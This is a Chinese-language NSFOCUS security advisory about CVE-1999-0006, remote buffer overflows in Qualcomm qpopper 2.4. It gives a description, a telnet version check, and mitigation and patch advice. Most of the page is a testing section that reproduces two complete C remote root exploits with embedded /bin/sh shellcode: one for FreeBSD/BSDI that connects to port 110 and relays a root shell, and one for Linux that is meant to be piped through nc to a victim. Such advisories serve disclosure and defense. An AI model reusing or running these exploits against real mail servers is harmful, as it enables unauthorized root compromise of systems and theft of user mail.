安全研究
安全漏洞
Qualcomm QPopper多个命令远程缓冲区溢出漏洞
发布日期:1998-06-27
更新日期:1998-06-27
受影响系统:
Qualcomm qpopper 2.4描述:
BUGTRAQ ID: 133
CVE(CAN) ID: CVE-1999-0006
QPopper是一款由Qualcomm开发和维护免费开放源代码的软件,可使用在多种Linux和Unix操作系统下。
2.5版本以前的qpopper存在许多缓冲区溢出漏洞,远程攻击者可以利用这些漏洞通过溢出攻击在受影响主机执行任意指令。
漏洞存在于qpopper没有正确检查过滤用户输入的POP命令(包括USER、PASS),如果参数超过1024字节就会产生缓冲区溢出。这个漏洞在Bugtraq被广泛的讨论,已经有基于Linux和*BSD系统的攻击程序。
确认主机是否受影响,可以使用下面的命令:
% telnet yourmailhost.your.domain.com 110
Trying 123.123.123.123
Connected to mailhost
+OK QPOP (version 2.4) at yourmailhost.your.domain.com starting
如果返回的版本是2.5以前(包括2.5 beta),那么说明你的主机受影响,请尽快升级到最新版本。
<*来源:Seth McGann (smm@WPI.EDU)
MiG (mig@SILESIA.PL)
warchild@cryogen.com (warchild@cryogen.com)
链接:http://archives.neohapsis.com/archives/bugtraq/1998_2/0680.html
http://archives.neohapsis.com/archives/bugtraq/1998_2/0619.html
http://archives.neohapsis.com/archives/bugtraq/1998_2/0686.html
http://www.cert.org/advisories/CA-1998-08.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* QPOPPER - remote root exploit
* by Miroslaw Grzybek <mig@zeus.polsl.gliwice.pl>
*
* - tested against: FreeBSD 3.0
* FreeBSD 2.2.x
* BSDI BSD/OS 2.1
* - offsets: FreeBSD with qpopper 2.3 - 2.4 0
* FreeBSD with qpopper 2.1.4-R3 900
* BSD/OS with qpopper 2.1.4-R3 1500
*
* this is for EDUCATIONAL purposes ONLY
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/errno.h>
char *shell="\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
"\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e"
"\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
"\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff"
"\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
"\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";
#define ADDR 0xefbfd504
#define OFFSET 0
#define BUFLEN 1200
char buf[BUFLEN];
int offset=OFFSET;
int sock;
struct sockaddr_in sa;
struct hostent *hp;
void main (int argc, char *argv[]) {
int i;
if(argc<2) {
printf("Usage: %s <IP | HOSTNAME> [offset]\n",argv[0]);
exit(0);
}
if(argc>2)
offset=atoi(argv[2]);
/* Prepare buffer */
memset(buf,0x90,BUFLEN);
memcpy(buf+800,shell,strlen(shell));
for(i=901;i<BUFLEN-4;i+=4)
*(int *)&buf[i]=ADDR+offset;
buf[BUFLEN]='\n';
/* Resolve remote hostname & connect*/
if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
perror("gethostbyname()");
exit(0);
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("socket()");
exit(0);
}
sa.sin_family=AF_INET;
sa.sin_port=htons(110);
memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
perror("connect()");
exit(0);
}
printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); fflush(stdout);
/* Write evil data */
write(sock,buf,strlen(buf));
/* Enjoy root shell ;) */
while(1) {
fd_set input;
FD_SET(0,&input);
FD_SET(sock,&input);
if((select(sock+1,&input,NULL,NULL,NULL))<0) {
if(errno==EINTR) continue;
printf("CONNECTION CLOSED...\n"); fflush(stdout);
exit(1);
}
if(FD_ISSET(sock,&input))
write(1,buf,read(sock,buf,BUFLEN));
if(FD_ISSET(0,&input))
write(sock,buf,read(0,buf,BUFLEN));
}
}
WaR(warchild@cryogen.com) zav(zav@cryogen.com) 提供了如下测试程序:
/* Exploit for qpopper 2.4 (and others) for Linux
* by [WaR] (warchild@cryogen.com) and zav (zav@cryogen.com)
*
* usage: (./qpopper <offset>;cat)|nc <victim> 110
* with offset around 1000 (try increments of 50)
*
*
* shout outs to: Zef and YZF
*/
#include <stdio.h>
#include <stdlib.h>
#define BUFFSIZE 998
char shell[] =
"\xeb\x33\x5e\x89\x76\x08\x31\xc0"
"\x88\x66\x07\x83\xee\x02\x31\xdb"
"\x89\x5e\x0e\x83\xc6\x02\xb0\x1b"
"\x24\x0f\x8d\x5e\x08\x89\xd9\x83"
"\xee\x02\x8d\x5e\x0e\x89\xda\x83"
"\xc6\x02\x89\xf3\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xc8\xff"
"\xff\xff/bin/sh";
unsigned long esp()
{
__asm__(" movl %esp,%eax ");
}
main(int argc, char **argv)
{
int i,j,offset;
unsigned long eip;
char buffer[4096];
j=0;
offset=atoi(argv[1]);
eip=esp()+offset;
for(i=0;i<1008;i++) buffer[i]=0x90;
for(i=(BUFFSIZE - strlen(shell));i<BUFFSIZE;i++) buffer[i]=shell[j++];
i=1005;
buffer[i]=eip & 0xff;
buffer[i+1]=(eip >> 8) & 0xff;
buffer[i+2]=(eip >> 16) & 0xff;
buffer[i+3]=(eip >> 24) & 0xff;
printf("%s\nsh -i\n",buffer);
}
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 暂时关闭pop服务,或者在边界防火墙设置策略,只允许可信用户访问。
厂商补丁:
Qualcomm
--------
请到厂商下载当前最新版本:
ftp://ftp.qualcomm.com/
浏览次数:19573
严重程度:0(网友投票)
绿盟科技给您安全的保障